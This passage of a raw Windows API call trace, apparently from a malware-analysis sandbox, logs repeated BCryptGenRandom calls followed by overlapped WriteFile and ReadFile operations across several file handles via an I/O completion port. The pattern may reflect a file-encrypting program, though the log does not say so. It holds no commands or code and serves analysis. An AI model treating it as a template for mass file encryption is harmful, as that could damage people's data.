lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.353] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.353] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.353] free (_Block=0x3e305b8) [0162.353] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.353] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.353] free (_Block=0x1fa91d0) [0162.353] free (_Block=0x1fa2ed8) [0162.353] free (_Block=0x1fa90b8) [0162.353] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.368] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.368] free (_Block=0x3e305b8) [0162.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.368] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.368] free (_Block=0x1fa91d0) [0162.368] free (_Block=0x1fa2ed8) [0162.368] free (_Block=0x1fa90b8) [0162.368] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.381] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.381] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.381] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.381] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.382] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.382] free (_Block=0x3e305b8) [0162.382] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.382] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.382] free (_Block=0x1fa91d0) [0162.382] free (_Block=0x1fa2ed8) [0162.382] free (_Block=0x1fa90b8) [0162.382] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.383] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.395] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.395] free (_Block=0x3e305b8) [0162.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.395] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.396] free (_Block=0x1fa91d0) [0162.396] free (_Block=0x1fa2ed8) [0162.396] free (_Block=0x1fa90b8) [0162.396] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.409] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.421] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.421] free (_Block=0x3e305b8) [0162.421] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.421] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.421] free (_Block=0x1fa91d0) [0162.421] free (_Block=0x1fa2ed8) [0162.421] free (_Block=0x1fa90b8) [0162.421] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.542] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.551] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.551] free (_Block=0x3e305b8) [0162.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.551] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.552] free (_Block=0x1fa91d0) [0162.552] free (_Block=0x1fa2ed8) [0162.552] free (_Block=0x1fa90b8) [0162.552] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.557] CloseHandle (hObject=0x2a4) returned 1 [0162.558] free (_Block=0x1ff1e60) [0162.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.566] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.566] free (_Block=0x3e305b8) [0162.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.566] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.567] free (_Block=0x1fa91d0) [0162.567] free (_Block=0x1fa2ed8) [0162.567] free (_Block=0x1fa90b8) [0162.567] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.622] CloseHandle (hObject=0x308) returned 1 [0162.623] free (_Block=0x3df0008) [0162.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.635] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.844] CloseHandle (hObject=0x338) returned 1 [0162.844] free (_Block=0x3f70048) [0162.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.855] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.855] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.855] free (_Block=0x3e305b8) [0162.855] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.855] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.855] free (_Block=0x1fa91d0) [0162.855] free (_Block=0x1fa2ed8) [0162.855] free (_Block=0x1fa90b8) [0162.855] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.866] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.866] free (_Block=0x3e305b8) [0162.866] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.866] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.866] free (_Block=0x1fa91d0) [0162.866] free (_Block=0x1fa2ed8) [0162.866] free (_Block=0x1fa90b8) [0162.866] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0163.096] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0163.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0163.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0163.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0163.107] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.107] free (_Block=0x3e305b8) [0163.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.108] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.108] free (_Block=0x1fa91d0) [0163.108] free (_Block=0x1fa2ed8) [0163.108] free (_Block=0x1fa90b8) [0163.108] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0163.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0163.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0163.117] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.117] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.117] free (_Block=0x3e305b8) [0163.117] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.117] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.118] free (_Block=0x1fa91d0) [0163.118] free (_Block=0x1fa2ed8) [0163.118] free (_Block=0x1fa90b8) [0163.118] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0163.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.009] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0168.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0168.019] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.019] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.019] free (_Block=0x3e305b8) [0168.019] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.019] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.019] free (_Block=0x1fa91d0) [0168.019] free (_Block=0x1fa2ed8) [0168.019] free (_Block=0x1fa90b8) [0168.019] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.029] CloseHandle (hObject=0x2a8) returned 1 [0168.030] free (_Block=0x3f70048) [0168.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.055] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0168.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.064] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa202, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0168.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.156] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0168.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.187] CloseHandle (hObject=0x2a4) returned 1 [0168.187] free (_Block=0x3d70450) [0168.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0168.196] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x1770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0168.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, 